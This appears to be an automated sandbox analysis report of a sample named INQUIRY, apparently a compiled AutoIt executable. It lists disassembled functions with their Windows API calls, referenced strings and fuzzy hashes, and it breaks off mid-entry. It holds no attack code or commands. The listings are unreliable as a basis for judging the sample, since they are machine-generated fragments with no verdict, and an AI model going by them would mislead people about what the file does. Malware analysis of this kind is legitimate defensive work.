                                                                                              • Instruction ID: b1dffc2b1f465d30c01942583b3c56d0178367dbb6138093c13fb9f273c02154
                                                                                              • Opcode Fuzzy Hash: c719d528499600400eb02c7fd6d38a753ffc4a5c3e32b94410d35fe361e2a8a8
                                                                                              • Instruction Fuzzy Hash: DD31D631A003059FEF24CF98DD85BAEBBF8EF45350F1CC029EA89A61A1D7709944DB51
                                                                                              Function 00A839E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __snwprintf.LIBCMT ref: 00A83A66
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __snwprintf_memmove
                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                              • API String ID: 3506404897-2584243854
                                                                                              • Opcode ID: 8b5ed8ea192b0dda8e04436d997f204ab9de4746fd8fbb9cc156f526147c4893
                                                                                              • Instruction ID: 458a454234aba74d98e4b80c4eb93412ffffd4e40a3e49622e55778e8255fb4d
                                                                                              • Opcode Fuzzy Hash: 8b5ed8ea192b0dda8e04436d997f204ab9de4746fd8fbb9cc156f526147c4893
                                                                                              • Instruction Fuzzy Hash: E3216F31600219AECF14FF64CD82EEEB7B9BF44B40F544859F445AB181DB35EA85CBA1
                                                                                              Function 00A966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A96761
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A9676C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 840f630a46eb4cc8f4cc19cee7420ed4a69ab175e2abe12e3aa3dffeae4e6e43
                                                                                              • Instruction ID: f9979ebdf40e743043e4a26b9ec0ce298fff29cf589dd2b4c3b28910e45c8af0
                                                                                              • Opcode Fuzzy Hash: 840f630a46eb4cc8f4cc19cee7420ed4a69ab175e2abe12e3aa3dffeae4e6e43
                                                                                              • Instruction Fuzzy Hash: B411B271300208BFEF11CF94DC80EFB37AAEF483A8F110129F9149B290D6319C5187A0
                                                                                              Function 00A96C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
                                                                                                • Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
                                                                                                • Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A96C71
                                                                                              • GetSysColor.USER32(00000012), ref: 00A96C8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 10a4bbe2e5a4a6428221d77f6166aa469523f0a09ddab0a6da592c4b6342491b
                                                                                              • Instruction ID: 7f007b0a814bc0565d0f7160034611f68041941dd45540423712e69211426af4
                                                                                              • Opcode Fuzzy Hash: 10a4bbe2e5a4a6428221d77f6166aa469523f0a09ddab0a6da592c4b6342491b
                                                                                              • Instruction Fuzzy Hash: 1F212972610209AFDF04DFB8CD45AEA7BF8FF08314F154629F995D2250D635E851DB60
                                                                                              Function 00A96920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00A969A2
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A969B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: e2be66e0a3c8d191f334d7c6da7b85b44956c9b15f7a5da5201f1f99822dcc51
                                                                                              • Instruction ID: 9a639fd11dc776b5626acb2067747e6213e299ade167b5206272ac4ebc97b43d
                                                                                              • Opcode Fuzzy Hash: e2be66e0a3c8d191f334d7c6da7b85b44956c9b15f7a5da5201f1f99822dcc51
                                                                                              • Instruction Fuzzy Hash: 7C113A71611208AFEF108F649C45EEB37A9EF053B8F604724F9A5961E0CB75DC91A760
                                                                                              Function 00A729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72A22
                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A72A41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: f24bad5f396272ecab98d174959c1ba20dd5db02afb3ce9b9b189bc913cc7230
                                                                                              • Instruction ID: 9f531d54bf678cecf155d14d4b0f231ccfa565d2ade665b18a72b72bcfeb0c8d
                                                                                              • Opcode Fuzzy Hash: f24bad5f396272ecab98d174959c1ba20dd5db02afb3ce9b9b189bc913cc7230
                                                                                              • Instruction Fuzzy Hash: 93119072D01114ABDB30DBA9DC44BAA77B8AB45390F15C032E95DE72A0D770AD0AD791
                                                                                              Function 00A821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A8222C
                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A82255
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$OpenOption
                                                                                              • String ID: <local>
                                                                                              • API String ID: 942729171-4266983199
                                                                                              • Opcode ID: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
                                                                                              • Instruction ID: f7f76d880d3ba0196c612b484a32bc92d9d6e76556b3cec88b9d9fdac568be6c
                                                                                              • Opcode Fuzzy Hash: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
                                                                                              • Instruction Fuzzy Hash: 6511CEB0641225BEDB25AF518CC8FFBFBA8FF16751F10822AF91586000E6706991D7F0
                                                                                              Function 00A68E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A68E73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: a5b53473d18bf65d21b50c5661ecfd959507a6f3e887423359977c4afe26a46d
                                                                                              • Instruction ID: 1b18f19cbb42156765b8f5a31ddc387439fc7c8fb443af7bd6da5f1af99eb64d
                                                                                              • Opcode Fuzzy Hash: a5b53473d18bf65d21b50c5661ecfd959507a6f3e887423359977c4afe26a46d
                                                                                              • Instruction Fuzzy Hash: 3301F1B5A01218AB8B14EBF0CD41DFE737CAF11320B440A1AF831672E1DE369848CA50
                                                                                              Function 00A68CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A68D6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 5d31d5d202dd514d16fc3a458ecae4ea3c358a8c49052fc851bdda1f1bd37925
                                                                                              • Instruction ID: eec804be1e8cc4fe2c9634c9e131a4ddc66f61ab926965905ab2fcc4fdb3e95f
                                                                                              • Opcode Fuzzy Hash: 5d31d5d202dd514d16fc3a458ecae4ea3c358a8c49052fc851bdda1f1bd37925
                                                                                              • Instruction Fuzzy Hash: 9701DF75A41108FBCB15EBE0CA52EFE73BC9F25340F50011AB902672E1DE245E48DA72
                                                                                              Function 00A68D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A68DEE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 5b8a457e0a62a265c386571c53d9cc5948ce96fb84d0a40809a4b26d25cbac70
                                                                                              • Instruction ID: 7d7c160b5a894f73574c50002143d13d11a0c1292e45fbe48ea803e9bacd7c3c
                                                                                              • Opcode Fuzzy Hash: 5b8a457e0a62a265c386571c53d9cc5948ce96fb84d0a40809a4b26d25cbac70
                                                                                              • Instruction Fuzzy Hash: 7001FDB1A41108FBDB10EBE4CA42EFE73BC9F21340F50411AB902B32D2DE254E08DA72
                                                                                              Function 00A74F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp
                                                                                              • String ID: #32770
                                                                                              • API String ID: 2292705959-463685578
                                                                                              • Opcode ID: 27f3e774622591f8ff8bec2894f209a4dbd8f0fdb62b35ef1239d481e4cc4e17
                                                                                              • Instruction ID: 82583f078fa0696f88862c34af005bc3477a2cfe237e2a5e92df2f546cd6f4ae
                                                                                              • Opcode Fuzzy Hash: 27f3e774622591f8ff8bec2894f209a4dbd8f0fdb62b35ef1239d481e4cc4e17
                                                                                              • Instruction Fuzzy Hash: FFE092326042282AE720DB99AC4AFA7F7ACEB45B60F01006BFD04D6051DA609A5687E1
                                                                                              Function 00A4B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A4B314: _memset.LIBCMT ref: 00A4B321
                                                                                                • Part of subcall function 00A30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A4B2F0,?,?,?,00A1100A), ref: 00A30945
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00A1100A), ref: 00A4B2F4
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A1100A), ref: 00A4B303
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A4B2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 3158253471-631824599
                                                                                              • Opcode ID: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
                                                                                              • Instruction ID: 639c44493b851943d961d7cc52c4aac7d152cd3a57402155cf79a39229d8749e
                                                                                              • Opcode Fuzzy Hash: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
                                                                                              • Instruction Fuzzy Hash: 1AE06D742107108FD720DF6AD5047867BE8AF44344F00892EE456CB651EBB4E445CBB1
                                                                                              Function 00A67C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A67C82
                                                                                                • Part of subcall function 00A33358: _doexit.LIBCMT ref: 00A33362
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: f2b338057a395658073f5e03d6ef69d5e67e8e859e35b965ec5abc2275081dcf
                                                                                              • Instruction ID: 6cb1fccadfd489b246915b4612c1e4d054ce374a50ce72564d10a56a055e4834
                                                                                              • Opcode Fuzzy Hash: f2b338057a395658073f5e03d6ef69d5e67e8e859e35b965ec5abc2275081dcf
                                                                                              • Instruction Fuzzy Hash: 41D05B323C935C36D21533A96D07FCE75488F05F57F144826FB04995D34DD6859141E5
                                                                                              Function 00A51935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00A51775
                                                                                                • Part of subcall function 00A8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00A5195E,?), ref: 00A8BFFE
                                                                                                • Part of subcall function 00A8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A8C010
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A5196D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                              • String ID: WIN_XPe
                                                                                              • API String ID: 582185067-3257408948
                                                                                              • Opcode ID: b5220dd0344504f72e97a91f516f68333ea99e5145204d9900574a0d02634e9a
                                                                                              • Instruction ID: 1b36447774c20a08ecd55f897d388fc1caf8b782c3c365703a4aad7dac5fb2c0
                                                                                              • Opcode Fuzzy Hash: b5220dd0344504f72e97a91f516f68333ea99e5145204d9900574a0d02634e9a
                                                                                              • Instruction Fuzzy Hash: 88F0C970801109EFDB15DB95CA84BFCBBF8BB0C302F641096E512A61A1DB758F89DF60
                                                                                              Function 00A95998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A959AE
                                                                                              • PostMessageW.USER32(00000000), ref: 00A959B5
                                                                                                • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: f89c099b82206d6fd638062af70c796ba82b6d272c82910f59dd08a252629b99
                                                                                              • Instruction ID: 851fe1cc8dc8d3c13791d5cd9f3593cd229a8399c2e5e8ac8b876e0a431a9e7c
                                                                                              • Opcode Fuzzy Hash: f89c099b82206d6fd638062af70c796ba82b6d272c82910f59dd08a252629b99
                                                                                              • Instruction Fuzzy Hash: AFD0C9317803117BE664ABB09C0BFD76614BB04B50F01482AB34AEA1D1CDE4A801C694
                                                                                              Function 00A95964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9596E
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A95981
                                                                                                • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 77acfaf195a175a3222587164ecc9e32a2dc9b8917a9278101ba7e6e1bf9548b
                                                                                              • Instruction ID: ef0df030c660ba7d5620b4be8375715e24008f6ba63db54e8bef12a7d95be6bc
